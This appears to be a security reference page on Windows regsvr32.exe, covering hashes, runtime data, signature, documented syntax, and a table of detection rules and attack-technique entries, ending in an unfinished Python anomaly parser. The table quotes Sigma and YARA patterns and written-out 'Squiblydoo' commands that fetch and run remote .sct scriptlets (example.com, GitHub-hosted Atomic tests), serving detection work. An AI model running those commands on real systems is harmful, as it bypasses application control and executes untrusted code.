regsvr32.exe
- File Path:
C:\Windows\system32\regsvr32.exe
- Description: Microsoft(C) Register Server
Hashes
Type | Hash |
---|---|
MD5 | DA0E9A7777D16AE18BD9C642A9F42223 |
SHA1 | FC99212A5F929D707AF49E8151CAB1E30FF658EB |
SHA256 | F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67 |
SHA384 | 6C3A7F8CA950E09AD85D774B4DB80781E9715A2A7011D784CFB86AC28A63A75AE8EE49F7BB12574412439FC0F94AD960 |
SHA512 | 1ED60C4D41EAE79A85F975891A018951503A53F083D2140B1F537A88AB5976D1DA239C8ACE57173B8CE3BA8CBD3DE07D5AEA5FA1B7C271E5F7B4444594D04D7D |
SSDEEP | 384:JPDotrdGJJHqNFYJypeqMKMPlhd5QkSg4rT9m/iGcQlUHB2rAOWrnLHWB:lDotrdGCNFR4XP9+khi9m/iGc4Uh2cL |
IMP | 0235FF9A007804882636BCCCFB4D1A2F |
PESHA1 | 3F560BAEF52531C6A0A2935525802A9B82066D76 |
PE256 | FA2F47546E63D978C53CB703509435FCBE34CD8560B35D9C17AA2FA13E1CADCA |
Runtime Data
Window Title:
RegSvr32
Open Handles:
Path | Type |
---|---|
(R-D) C:\Windows\Fonts\StaticCache.dat | File |
(R-D) C:\Windows\System32\en-US\imageres.dll.mui | File |
(R-D) C:\Windows\System32\en-US\regsvr32.exe.mui | File |
(RW-) C:\Users\user | File |
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567 | File |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db | Section |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db | Section |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro | Section |
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
\Sessions\2\Windows\Theme2131664586 | Section |
\Windows\Theme966197582 | Section |
Loaded Modules:
Path |
---|
C:\Windows\SYSTEM32\AcLayers.dll |
C:\Windows\System32\ADVAPI32.dll |
C:\Windows\SYSTEM32\apphelp.dll |
C:\Windows\System32\bcrypt.dll |
C:\Windows\System32\bcryptPrimitives.dll |
C:\Windows\System32\combase.dll |
C:\Windows\System32\GDI32.dll |
C:\Windows\System32\gdi32full.dll |
C:\Windows\SYSTEM32\IPHLPAPI.DLL |
C:\Windows\System32\kernel.appcore.dll |
C:\Windows\System32\KERNEL32.DLL |
C:\Windows\System32\KERNELBASE.dll |
C:\Windows\System32\msvcp_win.dll |
C:\Windows\System32\msvcrt.dll |
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\System32\OLEAUT32.dll |
C:\Windows\SYSTEM32\PROPSYS.dll |
C:\Windows\system32\regsvr32.exe |
C:\Windows\System32\RPCRT4.dll |
C:\Windows\System32\sechost.dll |
C:\Windows\SYSTEM32\sfc.dll |
C:\Windows\SYSTEM32\sfc_os.DLL |
C:\Windows\System32\shcore.dll |
C:\Windows\System32\SHLWAPI.dll |
C:\Windows\System32\ucrtbase.dll |
C:\Windows\System32\USER32.dll |
C:\Windows\System32\win32u.dll |
C:\Windows\SYSTEM32\WINSPOOL.DRV |
Signature
- Status: Signature verified.
- Serial:
33000001C422B2F79B793DACB20000000001C4
- Thumbprint:
AE9C1AE54763822EEC42474983D8B635116C8452
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: REGSVR32.EXE.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/69
- VirusTotal Link: https://www.virustotal.com/gui/file/f098fa150d9199732b4ec2e81528a951503a30f75afebf7e7a48360301758c67/detection/
File Similarity (ssdeep match)
File | Score |
---|---|
C:\Windows\SysWOW64\regsvr32.exe | 33 |
Possible Misuse
The following table contains possible examples of regsvr32.exe being misused. While regsvr32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | edr_command_execution_by_office_applications.yml | description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 | DRL 1.0 |
sigma | sysmon_suspicious_remote_thread.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | dns_query_win_regsvr32_network_activity.yml | title: Regsvr32 Network Activity | DRL 1.0 |
sigma | dns_query_win_regsvr32_network_activity.yml | description: Detects network connections and DNS queries initiated by Regsvr32.exe | DRL 1.0 |
sigma | dns_query_win_regsvr32_network_activity.yml | - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | DRL 1.0 |
sigma | dns_query_win_regsvr32_network_activity.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | file_event_win_creation_system_file.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | file_event_win_susp_clr_logs.yml | - 'regsvr32' | DRL 1.0 |
sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | # - '\regsvr32.exe' triggered by installing common software | DRL 1.0 |
sigma | net_connection_win_regsvr32_network_activity.yml | title: Regsvr32 Network Activity | DRL 1.0 |
sigma | net_connection_win_regsvr32_network_activity.yml | description: Detects network connections and DNS queries initiated by Regsvr32.exe | DRL 1.0 |
sigma | net_connection_win_regsvr32_network_activity.yml | - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | DRL 1.0 |
sigma | net_connection_win_regsvr32_network_activity.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_apt_bluemashroom.yml | - '\regsvr32' | DRL 1.0 |
sigma | proc_creation_win_apt_evilnum_jul20.yml | - 'regsvr32' | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | CommandLine\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_html_help_spawn.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'regsvr32' | DRL 1.0 |
sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'regsvr32' | DRL 1.0 |
sigma | proc_creation_win_malware_qbot.yml | - 'regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_mmc_spawn_shell.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_monitoring_for_persistence_via_bits.yml | CommandLine\|re: '(?i).*bitsadmin.*\/SetNotifyCmdLine.*(%COMSPEC%\|cmd.exe\|regsvr32.exe).*' | DRL 1.0 |
sigma | proc_creation_win_mshta_spawn_shell.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | description: Initial execution of malicious document calls wmic to execute the file with regsvr32 | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | title: Excel Proxy Executing Regsvr32 With Payload | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'regsvr32' | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | title: Excel Proxy Executing Regsvr32 With Payload | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. | DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - '*regsvr32*' | DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_office_spawning_wmi_commandline.yml | description: Initial execution of malicious document calls wmic to execute the file with regsvr32 | DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_possible_applocker_bypass.yml | # - '\regsvr32.exe' # too many FPs, very noisy | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - 'regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_anomalies.yml | title: Regsvr32 Anomaly | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_anomalies.yml | description: Detects various anomalies in relation to regsvr32.exe | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_anomalies.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_anomalies.yml | ParentImage\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_anomalies.yml | CommandLine\|contains: '..\..\..\Windows\System32\regsvr32.exe ' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | title: Regsvr32 Flags Anomaly | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_flags_anomaly.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_http_pattern.yml | title: Suspicious Regsvr32 HTTP IP Pattern | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_http_pattern.yml | description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_image.yml | title: Suspicious Regsvr32 Execution With Image Extension | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_image.yml | description: utilizes REGSVR32.exe to execute this DLL masquerading as a Image file | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_image.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_no_dll.yml | title: Regsvr32 Command Line Without DLL | DRL 1.0 |
sigma | proc_creation_win_susp_regsvr32_no_dll.yml | Image\|endswith: '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_system_exe_anomaly.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | proc_creation_win_task_folder_evasion.yml | description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr | DRL 1.0 |
sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\regsvr32.exe' | DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentversion.yml | Image: 'C:\Windows\system32\regsvr32.exe' | DRL 1.0 |
sigma | registry_event_office_vsto_persistence.yml | - '\regsvr32.exe' # e.g. default Evernote installation | DRL 1.0 |
LOLBAS | Cmd.yml | - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat | |
LOLBAS | Regsvr32.yml | Name: Regsvr32.exe | |
LOLBAS | Regsvr32.yml | - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | |
LOLBAS | Regsvr32.yml | - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | |
LOLBAS | Regsvr32.yml | - Path: C:\Windows\System32\regsvr32.exe | |
LOLBAS | Regsvr32.yml | - Path: C:\Windows\SysWOW64\regsvr32.exe | |
LOLBAS | Regsvr32.yml | - IOC: regsvr32.exe retrieving files from Internet | |
LOLBAS | Regsvr32.yml | - IOC: regsvr32.exe executing scriptlet (sct) files | |
LOLBAS | Regsvr32.yml | - IOC: DotNet CLR libraries loaded into regsvr32.exe | |
LOLBAS | Regsvr32.yml | - IOC: DotNet CLR Usage Log - regsvr32.exe.log | |
LOLBAS | Regsvr32.yml | - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | |
malware-ioc | nukesped_lazarus | . REGSVR32.EXE``{:.highlight .language-cmhg} | © ESET 2014-2018 |
malware-ioc | nukesped_lazarus | . REGSVR32.exe``{:.highlight .language-cmhg} | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "value": "Regsvr32 - T1117", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nDetection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nPlatforms: Windows\n\nData Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator\n\nRemote Support: No\n\nContributors: Casey Smith", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", | © ESET 2014-2018 |
malware-ioc | oceanlotus | \|T1117\|Regsvr32 | © ESET 2014-2018 |
atomic-red-team | problem_report.md | e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - T1218.010 Regsvr32 | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #3: Regsvr32 local DLL execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #4: Regsvr32 Registering Non DLL [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1218.010 Regsvr32 | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #3: Regsvr32 local DLL execution [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #4: Regsvr32 Registering Non DLL [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | \| \| \| \| \| Regsvr32 \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | \| \| \| \| \| Regsvr32 \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.003.md | Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.008.md | Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"} ). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | # T1218.010 - Regsvr32 | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | <blockquote>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | - Atomic Test #1 - Regsvr32 local COM scriptlet execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | - Atomic Test #2 - Regsvr32 remote COM scriptlet execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | - Atomic Test #3 - Regsvr32 local DLL execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | - Atomic Test #4 - Regsvr32 Registering Non DLL | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | - Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ## Atomic Test #1 - Regsvr32 local COM scriptlet execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | \| filename \| Name of the local file, include path. \| Path \| PathToAtomicsFolder\T1218.010\src\RegSvr32.sct\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | \| regsvr32path \| Default location of Regsvr32.exe \| Path \| C:\Windows\system32\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | \| regsvr32name \| Default name of Regsvr32.exe \| String \| regsvr32.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ##### Description: Regsvr32.sct must exist on disk at specified location (#(unknown)) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct” -OutFile “#(unknown)” | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | \| url \| URL to hosted sct file \| Url \| https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ## Atomic Test #3 - Regsvr32 local DLL execution | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | IF “%PROCESSOR_ARCHITECTURE%”==”AMD64” (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}#{regsvr32name} /s #{dll_name} ) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ## Atomic Test #4 - Regsvr32 Registering Non DLL | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | ## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | \| regsvr32path \| Default location of Regsvr32.exe \| String \| C:\Windows\system32\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1220.md | Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.006.md | regsvr32 /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.006.md | regsvr32 /u /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” | MIT License. © 2018 Red Canary |
signature-base | apt_apt30_backspace.yar | $s0 = “regsvr32 /s "%ProgramFiles%\Norton360\Engine\5.1.0.29\ashelper.dll"” fullword | CC BY-NC 4.0 |
signature-base | apt_codoso.yar | $s1 = “regsvr32.exe /s "%s"” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_leviathan.yar | $x2 = “regsvr32 /s "%s" DR CIM” fullword wide | CC BY-NC 4.0 |
signature-base | apt_ta17_318A.yar | $s1 = “REGSVR32.EXE.MUI” fullword wide | CC BY-NC 4.0 |
signature-base | crime_cobaltgang.yar | $x2 = “WriteLine(" (new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” ascii | CC BY-NC 4.0 |
signature-base | crime_cobaltgang.yar | $x4 = “sh.Run(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
signature-base | crime_cobaltgang.yar | $x5 = “.Get(‘Win32_ScheduledJob’).Create(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
signature-base | gen_cn_hacktool_scripts.yar | $s0 = “regsvr32.exe /u C:\windows\system32\PacketX.dll” fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_hacktool_scripts.yar | $s1 = “regsvr32.exe C:\windows\system32\PacketX.dll” fullword ascii | CC BY-NC 4.0 |
signature-base | gen_mal_scripts.yar | $x2 = “.Run(‘regsvr32 /s /u /i:” ascii | CC BY-NC 4.0 |
signature-base | gen_mal_scripts.yar | $x3 = “new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” fullword ascii | CC BY-NC 4.0 |
signature-base | gen_recon_indicators.yar | $s11 = “regsvr32 /s /u “ ascii | CC BY-NC 4.0 |
signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell\|cmd\|certutil\|mshta\|wscript\|cscript\|rundll32\|wmic\|regsvr32\|msbuild)(.exe\|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s1 = “exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, “ ascii | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s3 = “oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False” fullword ascii | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s4 = “EchoB("regsvr32.exe exitcode = " & exitcode)” fullword ascii | CC BY-NC 4.0 |
signature-base | yara_mixed_ext_vars.yar | Identifier: regsvr32 issue | CC BY-NC 4.0 |
signature-base | yara_mixed_ext_vars.yar | description = “Detects a scriptlet file in the temporary Internet files (see regsvr32 AppLocker bypass)” | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
regsvr32
Registers .dll files as command components in the registry.
Syntax
regsvr32 [/u] [/s] [/n] [/i[:cmdline]] <Dllname>
Parameters
Parameter | Description |
---|---|
/u | Unregisters server. |
/s | Prevents displaying messages. |
/n | Prevents calling DllRegisterServer. This parameter requires you to also use the /i parameter. |
/i:<cmdline> | Passes an optional command-line string (cmdline) to DllInstall. If you use this parameter with the /u parameter, it calls DllUninstall. |
<Dllname> | The name of the .dll file that will be registered. |
/? | Displays help at the command prompt. |
Examples
To register the .dll for the Active Directory Schema, type:
regsvr32 schmmgmt.dll
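As an added example (not part of this page, of Microsoft's documentation, or of any rule set listed in the Possible Misuse table), the Python below parses a regsvr32 command line according to the syntax documented above and reports the anomalies that the Sigma rules and LOLBAS IOCs in that table describe: /i without /n, a remote install source, plain HTTP to an IP literal, scriptlet execution via .sct or scrobj.dll, a non-.dll target and a command line without a DLL. All function names are mine, and the sample command lines are constructed (the host and IP literal are placeholders), not real telemetry.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# A double-quoted run (paths with spaces) or a bare word; quotes are stripped later.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# Plain http:// (not https) to a dotted-quad literal instead of a host name.
_HTTP_IP_RE = re.compile(r"^http://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:[/?#]|$)")
_SIMPLE_FLAGS = {"u": "unregister", "s": "silent", "n": "no_register"}


@dataclass
class RegsvrInvocation:
    """Flags of 'regsvr32 [/u] [/s] [/n] [/i[:cmdline]] <Dllname>' as parsed."""
    unregister: bool = False               # /u
    silent: bool = False                   # /s
    no_register: bool = False              # /n
    install: bool = False                  # /i
    install_cmdline: Optional[str] = None  # text after /i:
    dll: Optional[str] = None              # first positional argument
    other_flags: list = field(default_factory=list)  # anything else, e.g. '?'


def _apply_flag(inv: RegsvrInvocation, token: str) -> None:
    """Consume one flag token, including fused forms such as '/u/s'."""
    body = token[1:]
    while body:
        letter, body = body[0].lower(), body[1:]
        if letter == "i":
            inv.install = True
            if body.startswith(":"):
                inv.install_cmdline = body[1:]
            break                          # everything after /i: goes to DllInstall
        if letter in _SIMPLE_FLAGS:
            setattr(inv, _SIMPLE_FLAGS[letter], True)
        else:
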